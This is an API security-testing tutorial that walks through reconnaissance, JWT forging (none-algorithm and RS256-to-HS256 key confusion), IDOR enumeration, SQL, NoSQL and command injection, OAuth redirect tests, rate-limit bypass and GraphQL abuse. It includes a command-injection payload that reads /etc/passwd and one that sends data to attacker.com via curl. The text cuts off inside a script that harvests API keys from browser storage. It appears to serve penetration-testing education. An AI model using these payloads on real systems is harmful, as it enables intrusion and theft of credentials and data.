Mastery in API Security Testing

After spending years breaking into APIs across fintech, healthcare, and IoT platforms, I've seen firsthand how these critical interfaces have become the preferred attack vector for modern applications. The days of simple SQL injections against monolithic applications are fading; today's vulnerabilities live in the complex ecosystem of microservices, third-party integrations, and cloud-native APIs.
Executive Summary: This guide takes you from API fundamentals to advanced exploitation techniques through a systematic, hands-on approach. I've documented 42 distinct attack vectors, provided 16 detailed code examples, and included 6 decision trees to guide your testing methodology. By the end, you'll be able to thoroughly assess API security from multiple angles, whether you're testing a simple REST API or a complex GraphQL implementation with OAuth 2.0 authentication.
Beginner Level: API Security Fundamentals
What is an API?
An Application Programming Interface (API) is a set of rules that allows different software applications to communicate with each other. Think of it as a digital contract between systems: one side requests specific data or functionality, and the other responds according to predefined rules.
As I explain to clients: "APIs are like restaurant waiters: they take your order, relay it to the kitchen, and bring back exactly what you asked for. But just like a confused waiter might bring the wrong dish, an insecure API can serve up data it was never supposed to."
Types of APIs
Understanding the API landscape is crucial for effective security testing:
| API Type | Description | Common Protocols | Security Considerations |
|---|---|---|---|
| REST | Representational State Transfer, uses HTTP methods | HTTP/HTTPS | Relies on HTTP security mechanisms |
| SOAP | Simple Object Access Protocol, XML-based messaging | HTTP, SMTP | WS-Security extensions, complex security options |
| GraphQL | Query language for APIs, single endpoint | HTTP/HTTPS | Resolvers can expose unexpected data, introspection risks |
| gRPC | High-performance RPC framework | HTTP/2 | TLS, token-based auth, complex interceptors |
| WebSockets | Bidirectional communication channel | WS/WSS | Persistent connections, different auth model |
API Authentication Mechanisms
APIs use various methods to verify identity:
- No Authentication: Public APIs with no access controls (increasingly rare)
- API Keys: Simple tokens included in requests (often in headers)
- Basic Authentication: Base64-encoded username:password
- Bearer Tokens: JWT or OAuth access tokens
- OAuth 2.0 Flows: Authorization framework with multiple grant types
- OpenID Connect: Authentication layer on top of OAuth 2.0
- API Keys + Signatures: Request signing (e.g., AWS-style HMAC signatures)
- Mutual TLS: Certificate-based authentication on both sides
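When cataloguing endpoints, it can help to label each captured request with the mechanism it appears to use. The following is a rough sketch of doing that from request headers alone. The function name `classify_auth` and the API key header names it checks (`X-API-Key`, `api-key`, `apikey`) are assumptions chosen for illustration, not a standard, and mutual TLS cannot be detected this way because it happens below the HTTP layer.

```python
import base64
import binascii


def classify_auth(headers):
    """Guess the authentication mechanism from a dict of request headers."""
    # Header names are case-insensitive, so normalise them first
    lowered = {name.lower(): value for name, value in headers.items()}
    auth = lowered.get("authorization", "")
    scheme, _, credentials = auth.partition(" ")

    if scheme.lower() == "basic":
        try:
            decoded = base64.b64decode(credentials, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            return "basic (malformed)"
        # Basic credentials are only encoded, not encrypted
        username = decoded.split(":", 1)[0]
        return f"basic (user={username})"
    if scheme.lower() == "bearer":
        # Three dot-separated segments suggest a JWT; anything else is opaque
        return "bearer (jwt)" if credentials.count(".") == 2 else "bearer (opaque)"
    if scheme.startswith("AWS4-HMAC-SHA256"):
        # AWS Signature Version 4 style request signing
        return "signed request"
    # Assumed, commonly seen API key header names
    for name in ("x-api-key", "api-key", "apikey"):
        if name in lowered:
            return "api key"
    return "none detected"
```

A heuristic like this only sorts traffic into buckets for later testing; it says nothing about whether the server actually enforces the mechanism.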
API Reconnaissance Techniques
Before attempting any exploitation, thorough reconnaissance is essential:
1. Discovering API Endpoints
# Inspect web application traffic
# Open browser DevTools (F12) → Network tab
# Use automated discovery tools
ffuf -w wordlist.txt -u https://target.com/api/FUZZ -mc 200,201,204,400,401,403,500
# Check for robots.txt and sitemap.xml
curl https://target.com/robots.txt
curl https://target.com/sitemap.xml
2. Identifying API Documentation
# Common paths for API documentation
curl https://target.com/api/docs
curl https://target.com/swagger
curl https://target.com/swagger-ui.html
curl https://target.com/openapi.json
curl https://target.com/api-docs
3. Analyzing JavaScript Files for API Clues
// Code found in a web application's JS files might reveal API details
const API_KEY = "a1b2c3d4e5f6g7h8i9j0";
const API_ENDPOINT = "https://api.internal.target.com/v2";
async function getUserData(userId) {
const response = await fetch(`${API_ENDPOINT}/users/${userId}`, {
headers: {
"Authorization": `Bearer ${API_KEY}`,
"Content-Type": "application/json"
}
});
return response.json();
}
4. Mobile App Analysis
Mobile applications often contain API endpoints, keys, and authentication logic:
# For Android apps
jadx-gui app.apk
# Look for API configurations in:
# - Java/Kotlin source code
# - AndroidManifest.xml
# - res/xml/network_security_config.xml
# - assets/ directory files
Basic API Testing Tools
Start with these essential tools for API testing:
- Postman: GUI-based API client for easy request crafting and testing
- Burp Suite: Web proxy with extensive API testing capabilities
- curl: Command-line tool for crafting HTTP requests
- jq: Command-line JSON processor for API response analysis
- OWASP ZAP: Security-focused alternative to Burp Suite
Crafting Basic API Requests
Understanding how to manually craft API requests is foundational:
# Basic GET request
curl -X GET "https://api.example.com/users"
# GET request with API key in header
curl -X GET "https://api.example.com/users" \
-H "X-API-Key: your_api_key_here"
# POST request with JSON body
curl -X POST "https://api.example.com/users" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your_jwt_token_here" \
-d '{"name": "John Doe", "email": "john@example.com"}'
Alternative Tools: Insomnia REST Client and HTTPie are excellent alternatives to Postman and curl, providing more intuitive interfaces for API testing.
Understanding API Responses
API responses typically include:
- Status Codes: Indicating success or failure (200 OK, 404 Not Found, etc.)
- Headers: Metadata about the response
- Body: The actual content (usually JSON or XML)
- Error Messages: Information about what went wrong (often valuable for testing)
// Example API response (successful)
{
"status": "success",
"data": {
"id": 123,
"name": "John Doe",
"email": "john@example.com",
"role": "user",
"created_at": "2023-01-15T08:30:00Z"
}
}
// Example API response (error)
{
"status": "error",
"error": {
"code": "INVALID_PARAMETER",
"message": "The provided email address is not valid",
"details": {
"field": "email",
"value": "not-an-email",
"constraint": "email_format"
}
}
}
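Scanning response bodies by eye gets tedious once an API returns nested objects. The sketch below walks a parsed JSON body and lists the paths of keys whose names look sensitive. The hint list in `SENSITIVE_HINTS` is an assumption and should be tuned per target; the sample body is a trimmed copy of the successful response shown earlier.

```python
import json

# Assumed list of field-name fragments worth a second look; tune per target
SENSITIVE_HINTS = ("password", "token", "secret", "ssn", "card", "role", "email")


def find_sensitive_fields(body, prefix=""):
    """Return dotted paths of keys whose names contain a sensitive hint."""
    hits = []
    if isinstance(body, dict):
        for key, value in body.items():
            path = f"{prefix}.{key}" if prefix else key
            if any(hint in key.lower() for hint in SENSITIVE_HINTS):
                hits.append(path)
            hits.extend(find_sensitive_fields(value, path))
    elif isinstance(body, list):
        for index, item in enumerate(body):
            hits.extend(find_sensitive_fields(item, f"{prefix}[{index}]"))
    return hits


response_text = (
    '{"status": "success", "data": {"id": 123, "name": "John Doe", '
    '"email": "john@example.com", "role": "user"}}'
)
print(find_sensitive_fields(json.loads(response_text)))
# prints ['data.email', 'data.role']
```

Matching on key names is deliberately crude: it will miss sensitive values stored under innocuous names, so it complements manual review rather than replacing it.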
Basic Vulnerability Categories
At a high level, API vulnerabilities fall into these categories:
- Authentication Flaws: Weaknesses in verifying identity
- Authorization Flaws: Improper access controls
- Injection Vulnerabilities: SQL, NoSQL, Command, etc.
- Improper Data Exposure: Sensitive data leaked in responses
- Mass Assignment: API accepts more parameters than intended
- Rate Limiting Issues: Lack of protection against abuse
- Business Logic Flaws: Vulnerabilities in application flow
Hands-On Challenge #1: API Discovery and Basic Testing
Try This: Select a target web application (use publicly available API testing sites like httpbin.org, jsonplaceholder.typicode.com, or OWASP Juice Shop for practice). Using browser DevTools:
- Identify 3 API endpoints
- Document the authentication mechanism
- Craft curl commands for each endpoint
- Analyze responses for sensitive data exposure
Intermediate Level: Common API Vulnerabilities
Now that you understand the basics, let's explore common vulnerability categories and how to exploit them.
Authentication Bypass Techniques
1. Broken API Key Implementation
Many APIs implement key-based authentication incorrectly:
# Original request with API key
curl -X GET "https://api.example.com/users" \
-H "X-API-Key: abcd1234"
# Try without API key
curl -X GET "https://api.example.com/users"
# Try with API key in different locations
curl -X GET "https://api.example.com/users?api_key=abcd1234"
curl -X GET "https://api.example.com/users" \
-H "api-key: abcd1234"
curl -X GET "https://api.example.com/users" \
-H "apikey: abcd1234"
2. JWT Token Vulnerabilities
JSON Web Tokens (JWTs) are commonly used for authentication but often have implementation flaws:
# Python script to analyze and manipulate JWT tokens (standard library only)
import base64
import json


def b64url_decode(segment):
    """Decode a base64url JWT segment, restoring the stripped padding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(data):
    """Encode bytes as unpadded base64url, the encoding JWTs use."""
    return base64.urlsafe_b64encode(data).decode("utf-8").rstrip("=")


# Decode token without verification
def decode_jwt(token):
    parts = token.split(".")
    if len(parts) != 3:
        return "Not a valid JWT format"
    # Decode header and payload
    header = json.loads(b64url_decode(parts[0]))
    payload = json.loads(b64url_decode(parts[1]))
    return {"header": header, "payload": payload, "signature": parts[2]}


# Check for 'none' algorithm vulnerability
def create_none_token(token):
    parts = token.split(".")
    header = json.loads(b64url_decode(parts[0]))
    payload = json.loads(b64url_decode(parts[1]))
    # Modify header to use 'none' algorithm
    header["alg"] = "none"
    # Encode header and payload
    new_header = b64url_encode(json.dumps(header).encode())
    new_payload = b64url_encode(json.dumps(payload).encode())
    # Create new token with empty signature
    return f"{new_header}.{new_payload}."


# Try to forge admin token
def elevate_privileges(token):
    parts = token.split(".")
    payload = json.loads(b64url_decode(parts[1]))
    # Attempt privilege escalation
    if "role" in payload:
        payload["role"] = "admin"
    if "permissions" in payload:
        payload["permissions"] = ["admin", "read", "write", "delete"]
    if "user_id" in payload:
        # Try changing to a known admin ID, like 1
        payload["user_id"] = 1
    # Encode the modified payload
    new_payload = b64url_encode(json.dumps(payload).encode())
    # Return the token with modified payload but same header and signature
    # This won't work if signature verification is proper, but worth trying
    return f"{parts[0]}.{new_payload}.{parts[2]}"


# Example usage
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoyLCJyb2xlIjoidXNlciIsImV4cCI6MTY2MDAwMDAwMH0.9iHnP_5jQGRCAxcszmOB5HS8YzH5DkxmCrRHXBZzP4c"
print("Original token decoded:")
print(decode_jwt(token))
print("\nNone algorithm token:")
print(create_none_token(token))
print("\nPrivilege escalation attempt:")
print(elevate_privileges(token))
Common JWT vulnerabilities include:
- Using 'none' algorithm
- Weak signature verification
- Missing expiration checking
- Accepting tokens without signature verification
- Using weak secret keys
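Some of the items above can be spotted from the token itself before any request is sent. The sketch below inspects the unverified header and payload and reports the `none` algorithm, an empty signature, and a missing or past `exp` claim. The function name `audit_jwt` and the wording of the findings are assumptions for illustration; weak secrets and skipped signature verification cannot be detected offline this way and still need server-side testing.

```python
import base64
import json
import time


def b64url_decode(segment):
    """Decode a base64url segment, restoring the stripped padding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def audit_jwt(token, now=None):
    """Return a list of findings based on the token's unverified contents."""
    now = time.time() if now is None else now
    header_b64, payload_b64, signature = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))

    findings = []
    if str(header.get("alg", "")).lower() == "none":
        findings.append("alg is 'none'")
    if not signature:
        findings.append("empty signature")
    if "exp" not in payload:
        findings.append("no exp claim")
    elif payload["exp"] < now:
        # Worth replaying: an expired token that still works is a finding
        findings.append("token already expired")
    return findings
```

An expired token is only a lead: the actual vulnerability is confirmed when the API still accepts it.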
3. OAuth 2.0 Implementation Flaws
# Testing for OAuth redirect_uri validation issues
# Original authorization request
curl "https://auth.example.com/oauth/authorize?client_id=legitimate_app&redirect_uri=https://legitimate-app.com/callback&response_type=code"
# Modified redirect_uri tests
curl "https://auth.example.com/oauth/authorize?client_id=legitimate_app&redirect_uri=https://attacker.com/callback&response_type=code"
curl "https://auth.example.com/oauth/authorize?client_id=legitimate_app&redirect_uri=https://legitimate-app.com.attacker.com/callback&response_type=code"
curl "https://auth.example.com/oauth/authorize?client_id=legitimate_app&redirect_uri=https://legitimate-app.com@attacker.com/callback&response_type=code"
curl "https://auth.example.com/oauth/authorize?client_id=legitimate_app&redirect_uri=https://legitimate-app.com%2F..%2F..%2Fattacker&response_type=code"
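To see why the modified `redirect_uri` values are worth trying, it helps to look at the kind of server-side check they are designed to defeat. The sketch below contrasts a hypothetical prefix-based check with exact string matching, which the OAuth 2.0 security best current practice recommends. `REGISTERED`, `naive_check`, and `strict_check` are illustrative names, not part of any real authorization server.

```python
from urllib.parse import urlsplit

# Hypothetical redirect URI registered for the client
REGISTERED = "https://legitimate-app.com/callback"


def naive_check(redirect_uri):
    """Flawed: prefix matching on the raw string."""
    return redirect_uri.startswith("https://legitimate-app.com")


def strict_check(redirect_uri):
    """Safer: exact string comparison against the registered value."""
    return redirect_uri == REGISTERED


candidates = [
    "https://legitimate-app.com/callback",
    "https://attacker.com/callback",
    "https://legitimate-app.com.attacker.com/callback",
    "https://legitimate-app.com@attacker.com/callback",
]
for uri in candidates:
    # The hostname shows where the browser would really be sent
    host = urlsplit(uri).hostname
    print(f"{uri}\n  host={host} naive={naive_check(uri)} strict={strict_check(uri)}")
```

The last two candidates pass the prefix check even though their real host is attacker-controlled: in the `@` form, everything before the `@` is treated as userinfo, so the host is `attacker.com`.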
Authorization Bypass Techniques
1. Horizontal Privilege Escalation
Accessing resources belonging to other users at the same privilege level:
# Original request to get user's own profile
curl -X GET "https://api.example.com/users/profile/1234" \
-H "Authorization: Bearer user_jwt_token"
# Attempt to access another user's profile by changing the ID
curl -X GET "https://api.example.com/users/profile/5678" \
-H "Authorization: Bearer user_jwt_token"
2. Vertical Privilege Escalation
Accessing resources requiring higher privileges:
# Original user-level request
curl -X GET "https://api.example.com/users" \
-H "Authorization: Bearer user_jwt_token"
# Attempt to access admin endpoint
curl -X GET "https://api.example.com/admin/users" \
-H "Authorization: Bearer user_jwt_token"
3. IDOR (Insecure Direct Object Reference)
Testing for IDOR vulnerabilities:
// Automated IDOR testing script
const axios = require('axios');
const fs = require('fs');
// Configuration
const BASE_URL = 'https://api.example.com';
const ENDPOINT = '/orders'; // Replace with target endpoint
const AUTH_TOKEN = 'Bearer your_token_here';
const VALID_ID = '1001'; // Your known valid object ID
const YOUR_USER_ID = 42; // Placeholder: replace with the user ID your token belongs to
const ID_RANGE = 20; // How many IDs to test
const LOG_FILE = 'idor_results.json';
// Array to store results
const results = [];
// Function to test a single ID
async function testId(id) {
try {
const response = await axios({
method: 'GET',
url: `${BASE_URL}${ENDPOINT}/${id}`,
headers: {
'Authorization': AUTH_TOKEN,
'Content-Type': 'application/json'
}
});
return {
id,
status: response.status,
success: true,
data: response.data,
time: new Date().toISOString()
};
} catch (error) {
return {
id,
status: error.response ? error.response.status : 'Network Error',
success: false,
error: error.response ? error.response.data : error.message,
time: new Date().toISOString()
};
}
}
// Main function to run tests
async function runTests() {
console.log(`Starting IDOR tests for ${BASE_URL}${ENDPOINT}`);
// Test multiple IDs around the valid ID
const startId = parseInt(VALID_ID) - Math.floor(ID_RANGE / 2);
const endId = startId + ID_RANGE;
for (let id = startId; id <= endId; id++) {
console.log(`Testing ID: ${id}`);
const result = await testId(id.toString());
results.push(result);
// If successful, log more details
if (result.success) {
console.log(`ID ${id}: Success (Status ${result.status})`);
// Check if data looks like it belongs to another user
if (result.data && result.data.user_id && result.data.user_id !== YOUR_USER_ID) {
console.log(`POTENTIAL IDOR: Data belongs to user ${result.data.user_id}`);
}
} else {
console.log(`ID ${id}: Failed (Status ${result.status})`);
}
// Small delay to avoid rate limiting
await new Promise(resolve => setTimeout(resolve, 500));
}
// Save results to file
fs.writeFileSync(LOG_FILE, JSON.stringify(results, null, 2));
console.log(`Results saved to ${LOG_FILE}`);
}
// Run the tests
runTests().catch(console.error);
Injection Vulnerabilities in APIs
1. SQL Injection in API Parameters
# Original request
curl -X GET "https://api.example.com/products?category=electronics"
# Testing for SQL injection
curl -X GET "https://api.example.com/products?category=electronics'"
curl -X GET "https://api.example.com/products?category=electronics' OR 1=1--"
curl -X GET "https://api.example.com/products?category=electronics' UNION SELECT username,password,null FROM users--"
2. NoSQL Injection
MongoDB injection example:
// Original query
db.users.find({username: "john", password: "password123"});
// Injection via JSON parameters
// Using curl to send malicious JSON
curl -X POST "https://api.example.com/login" \
-H "Content-Type: application/json" \
-d '{"username": "john", "password": {"$ne": null}}'
curl -X POST "https://api.example.com/login" \
-H "Content-Type: application/json" \
-d '{"username": {"$regex": "admin"}, "password": {"$ne": null}}'
3. Command Injection
# Original request that might execute a command on the server
curl -X POST "https://api.example.com/system/ping" \
-H "Content-Type: application/json" \
-d '{"host": "8.8.8.8"}'
# Command injection attempts
curl -X POST "https://api.example.com/system/ping" \
-H "Content-Type: application/json" \
-d '{"host": "8.8.8.8; ls -la"}'
curl -X POST "https://api.example.com/system/ping" \
-H "Content-Type: application/json" \
-d '{"host": "8.8.8.8 && cat /etc/passwd"}'
curl -X POST "https://api.example.com/system/ping" \
-H "Content-Type: application/json" \
-d '{"host": "8.8.8.8 || curl http://attacker.com/$(whoami)"}'
API-Specific Vulnerabilities
1. Mass Assignment (Parameter Binding)
Exploiting endpoints that don't properly restrict which parameters can be modified:
# Original legitimate request to update user profile
curl -X PUT "https://api.example.com/users/profile" \
-H "Authorization: Bearer user_jwt_token" \
-H "Content-Type: application/json" \
-d '{"name": "John Doe", "email": "john@example.com"}'
# Mass assignment attempt to elevate privileges
curl -X PUT "https://api.example.com/users/profile" \
-H "Authorization: Bearer user_jwt_token" \
-H "Content-Type: application/json" \
-d '{"name": "John Doe", "email": "john@example.com", "role": "admin", "is_admin": true, "permissions": ["admin", "read", "write", "delete"]}'
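A 200 response to the second request does not prove the extra fields were applied; many frameworks silently ignore unknown parameters. One way to confirm is to fetch the profile before and after the update and compare. The helper below is a minimal sketch of that comparison; `detect_mass_assignment` and its arguments are hypothetical names, and it assumes the API returns the profile as a flat JSON object.

```python
def detect_mass_assignment(before, after, injected):
    """Return the injected fields whose values the server actually stored.

    before/after: profile dicts fetched before and after the update.
    injected: the extra fields that were added to the update request.
    """
    accepted = {}
    for field, value in injected.items():
        # Count a field only if it now holds our value and did not before
        if after.get(field) == value and before.get(field) != value:
            accepted[field] = value
    return accepted


before = {"name": "John Doe", "email": "john@example.com", "role": "user"}
after = {"name": "John Doe", "email": "john@example.com", "role": "admin"}
injected = {"role": "admin", "is_admin": True}
print(detect_mass_assignment(before, after, injected))
# prints {'role': 'admin'}
```

Fields that the API stores but never returns will not show up in this comparison, so a change in behavior (for example, an admin endpoint starting to respond) is still worth checking separately.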
2. Rate Limiting Bypass
# Python script to test rate limit bypass techniques
import requests
import time
import concurrent.futures


def test_rate_limit_endpoint(url, auth_header):
    """Test rate limiting on a specific endpoint"""
    print("Testing basic rate limiting...")
    # Simple rapid-fire requests
    for i in range(20):
        response = requests.get(url, headers=auth_header)
        print(f"Request {i+1}: Status {response.status_code}")
        if response.status_code == 429:
            print(f"Rate limit hit after {i+1} requests")
            break
    time.sleep(10)  # Wait for rate limit to reset

    print("\nTesting with different headers...")
    # Test IP spoofing via headers
    headers = {
        **auth_header,
        'X-Forwarded-For': '1.2.3.4',
        'X-Real-IP': '5.6.7.8'
    }
    for i in range(5):
        response = requests.get(url, headers=headers)
        print(f"X-Forwarded-For request {i+1}: Status {response.status_code}")
        # Try rotating IPs
        headers['X-Forwarded-For'] = f"1.2.3.{i+10}"
        headers['X-Real-IP'] = f"5.6.7.{i+10}"
    time.sleep(10)  # Wait for rate limit to reset

    print("\nTesting with parallel requests...")
    # Test with concurrent requests
    def make_request():
        return requests.get(url, headers=auth_header)

    with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
        future_to_response = {executor.submit(make_request): i for i in range(10)}
        for future in concurrent.futures.as_completed(future_to_response):
            i = future_to_response[future]
            try:
                response = future.result()
                print(f"Concurrent request {i+1}: Status {response.status_code}")
            except Exception as e:
                print(f"Concurrent request {i+1} generated an exception: {e}")
    time.sleep(10)  # Wait for rate limit to reset

    print("\nTesting with distributed requests pattern...")
    # Test distributed pattern (slower but more likely to evade rate limiting)
    for i in range(15):
        response = requests.get(url, headers=auth_header)
        print(f"Slow request {i+1}: Status {response.status_code}")
        time.sleep(2)  # Add delay between requests


# Example usage
api_url = "https://api.example.com/users"
auth_header = {"Authorization": "Bearer your_token_here"}
test_rate_limit_endpoint(api_url, auth_header)
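The fixed 10-second pauses in the script are a guess at the reset window. When a 429 response carries a `Retry-After` header, the server states the wait itself, either as a number of seconds or as an HTTP date. The helper below is a small sketch that converts either form to seconds; `retry_after_seconds` is a hypothetical name, and it returns `None` when the value cannot be parsed so the caller can fall back to a fixed delay.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime


def retry_after_seconds(value, now=None):
    """Convert a Retry-After header value to a non-negative number of seconds."""
    value = value.strip()
    if value.isdigit():
        # Delay-seconds form, e.g. "120"
        return int(value)
    now = now or datetime.now(timezone.utc)
    try:
        # HTTP-date form, e.g. "Wed, 21 Oct 2015 07:28:00 GMT"
        when = parsedate_to_datetime(value)
    except (TypeError, ValueError):
        return None
    if when.tzinfo is None:
        # Treat dates without zone information as UTC
        when = when.replace(tzinfo=timezone.utc)
    return max(0, int((when - now).total_seconds()))
```

In the script, this could replace a fixed pause with something like `time.sleep(retry_after_seconds(response.headers.get("Retry-After", "")) or 10)`.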
3. GraphQL Specific Vulnerabilities
The unique nature of GraphQL introduces specific security concerns:
# Introspection query to discover API schema
query IntrospectionQuery {
__schema {
queryType {
name
}
mutationType {
name
}
subscriptionType {
name
}
types {
...FullType
}
directives {
name
description
locations
args {
...InputValue
}
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type {
...TypeRef
}
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
}
}
}
Using the schema information, we can then construct targeted queries:
# Batch query attempt to extract multiple users at once
query getUsersInBatch {
user1: user(id: 1) {
id
username
email
address
creditCardNumber
}
user2: user(id: 2) {
id
username
email
address
creditCardNumber
}
user3: user(id: 3) {
id
username
email
address
creditCardNumber
}
# and so on...
}
# Nested query to potentially cause DoS
query nestedQuery {
allUsers {
id
friends {
id
friends {
id
friends {
id
friends {
id
# Keep nesting...
}
}
}
}
}
}
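Whether a nested query like the one above is accepted usually depends on a server-side depth limit, so it is useful to know the depth of each query being sent. The function below is an approximate sketch that measures nesting by counting braces while skipping comments and quoted strings. `query_depth` is a hypothetical helper; it does not parse GraphQL properly, so input object literals in arguments and block strings would skew the count.

```python
def query_depth(query):
    """Return the maximum brace nesting depth of a GraphQL query string."""
    depth = max_depth = 0
    in_string = False
    in_comment = False
    previous = ""
    for char in query:
        if in_comment:
            # Comments run until the end of the line
            in_comment = char != "\n"
        elif in_string:
            if char == '"' and previous != "\\":
                in_string = False
        elif char == "#":
            in_comment = True
        elif char == '"':
            in_string = True
        elif char == "{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif char == "}":
            depth -= 1
        previous = char
    return max_depth


nested = "query { allUsers { id friends { id friends { id } } } }"
print(query_depth(nested))  # prints 4
```

Sending queries of increasing depth and noting where the server starts rejecting them gives a quick read on whether a limit exists at all.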
API Fuzzing Techniques
Fuzzing is excellent for discovering hidden vulnerabilities:
# Install wfuzz
pip install wfuzz
# Basic endpoint fuzzing
wfuzz -c -z file,api_wordlist.txt -u https://api.example.com/FUZZ
# Parameter fuzzing
# (URLs containing ? are quoted so the shell does not treat them as glob patterns)
wfuzz -c -z file,parameters.txt -u "https://api.example.com/users?FUZZ=test"
# Value fuzzing with SQL injection payloads
wfuzz -c -z file,sqli_payloads.txt -u "https://api.example.com/users?id=FUZZ"
# Header fuzzing
wfuzz -c -z file,headers.txt -H "X-FUZZ: test" -u https://api.example.com/users
API Security Testing Decision Tree
Is authentication required?
├── Yes → Test authentication bypass
│ ├── Try blank/null credentials
│ ├── Test default credentials
│ ├── Check for API key in URL/header/cookie
│ └── Test JWT vulnerabilities
└── No → Move to authorization testing
Is authorization implemented?
├── Yes → Test access control
│ ├── Test vertical privilege escalation
│ ├── Test horizontal privilege escalation
│ ├── Check IDOR vulnerabilities
│ └── Test function-level access control
└── No → Document as a vulnerability
Parameter testing:
├── Test parameter pollution
├── Test SQL/NoSQL injection
├── Test command injection
├── Test XSS if API outputs to browser
└── Test for mass assignment
Response analysis:
├── Check for sensitive data exposure
├── Look for excessive data in responses
├── Check for detailed error messages
└── Check for metadata/debug information
Hands-On Challenge #2: API Vulnerability Discovery
Try This: Use the OWASP Juice Shop or other deliberately vulnerable applications to:
- Identify an API endpoint with IDOR vulnerability
- Exploit it to access another user's data
- Document the attack methodology and potential impact
Advanced Level: Complex Attack Chains
At the advanced level, we're looking at chaining multiple vulnerabilities together and exploring more complex API security issues.
Advanced Authentication Attacks
1. JWT Key Confusion Attacks
This technique exploits signature verification flaws in JWT implementations:
# Python script to exploit JWT key confusion (RS256 -> HS256)
import base64
import hashlib
import hmac
import json
import sys

import requests


def b64url_decode(segment):
    """Decode a base64url JWT segment, restoring the stripped padding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(data):
    """Encode bytes as unpadded base64url."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def decode_jwt_header(token):
    """Decode the JWT header without verification"""
    return json.loads(b64url_decode(token.split(".")[0]))


def exploit_key_confusion(token, public_key_file):
    """
    Exploit JWT key confusion by modifying the algorithm to
    use a known public key as an HMAC secret
    """
    # Read the public key as raw bytes; they must match, byte for byte
    # (including any trailing newline), what the server uses as its key
    with open(public_key_file, "rb") as f:
        public_key = f.read()
    # Decode the token parts
    parts = token.split(".")
    header = json.loads(b64url_decode(parts[0]))
    payload = json.loads(b64url_decode(parts[1]))
    # Modify claims if needed
    payload["admin"] = True
    # Change algorithm to HS256
    header["alg"] = "HS256"
    # Sign manually with the public key as the HMAC secret. Current PyJWT
    # releases refuse a PEM-encoded key as an HMAC secret, so jwt.encode()
    # would raise InvalidKeyError here
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    signature = hmac.new(public_key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(signature)}"


def test_token(url, token):
    """Test if the token works by making a request"""
    headers = {
        "Authorization": f"Bearer {token}"
    }
    response = requests.get(url, headers=headers)
    return response.status_code, response.text


# Usage example
if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: {sys.argv[0]} <token> <public_key_file> <test_url>")
        sys.exit(1)
    token = sys.argv[1]
    public_key_file = sys.argv[2]
    test_url = sys.argv[3]
    print(f"Original token header: {decode_jwt_header(token)}")
    forged_token = exploit_key_confusion(token, public_key_file)
    print(f"Forged token: {forged_token}")
    status, response = test_token(test_url, forged_token)
    print(f"Test result: HTTP {status}")
    print(f"Response: {response[:200]}...")  # Show first 200 chars
2. OAuth 2.0 Advanced Exploitation
OAuth 2.0 implementations often contain subtle vulnerabilities:
# Test for client_id enumeration
for i in {1..1000}; do
response=$(curl -s -o /dev/null -w "%{http_code}" \
"https://auth.example.com/oauth/authorize?client_id=$i&redirect_uri=https://example.com&response_type=code")
if [ "$response" -ne 404 ]; then
echo "Valid client_id found: $i (Status: $response)"
fi
done
# Test for access token leakage in logs
curl "https://api.example.com/login?access_token=test_token"
# Test for authorization code reuse
# 1. Obtain valid auth code through normal flow
# 2. Exchange it for an access token
curl -X POST "https://auth.example.com/oauth/token" \
-d "grant_type=authorization_code&code=valid_auth_code&redirect_uri=https://legitimate-app.com&client_id=legitimate_app&client_secret=client_secret"
# 3. Try to reuse the same code
curl -X POST "https://auth.example.com/oauth/token" \
-d "grant_type=authorization_code&code=valid_auth_code&redirect_uri=https://legitimate-app.com&client_id=legitimate_app&client_secret=client_secret"
3. API Key Leakage and Exfiltration
Finding and exploiting API keys in frontend code, HTTP history, and mobile apps:
// JavaScript to search for API keys in frontend code
function findApiKeys() {
const pageSource = document.documentElement.outerHTML;
// Common API key patterns
const patterns = [
/['"]?api[_-]?key['"]?\s*[:=]\s*['"]([a-zA-Z0-9_\-]{20,64})['"]/gi,
/['"]?access[_-]?key['"]?\s*[:=]\s*['"]([a-zA-Z0-9_\-]{20,64})['"]/gi,
/['"]?client[_-]?key['"]?\s*[:=]\s*['"]([a-zA-Z0-9_\-]{20,64})['"]/gi,
/['"]?secret[_-]?key['"]?\s*[:=]\s*['"]([a-zA-Z0-9_\-]{20,64})['"]/gi,
/authorization:\s*['"]?bearer\s+([a-zA-Z0-9_\-.+=]{20,64})['"]?/gi,
/authorization:\s*['"]?basic\s+([a-zA-Z0-9_\-./+=]{20,64})['"]?/gi
];
let found = [];
// Check each pattern
patterns.forEach(pattern => {
let match;
while ((match = pattern.exec(pageSource)) !== null) {
found.push({
key: match[1],
context: match[0],
pattern: pattern.toString()
});
}
});
// Check localStorage and sessionStorage
for (let i = 0; i < localStorage.length; i++) {
const key = localStorage.key(i);
const value = localStorage.getItem(key);
if (/key|token|auth|api/i.test(key) ||
/^[a-zA-Z0-9_\-]{20,64}$/.test(value)) {
found.push({
key: value,
source: `localStorage.${key}`,
context: `${key}: ${value}`
});
}
}
for (let i = 0; i < sessionStorage.length; i++) {
const key = sessionStorage.key(i);
const value = sessionStorage.getItem(key);
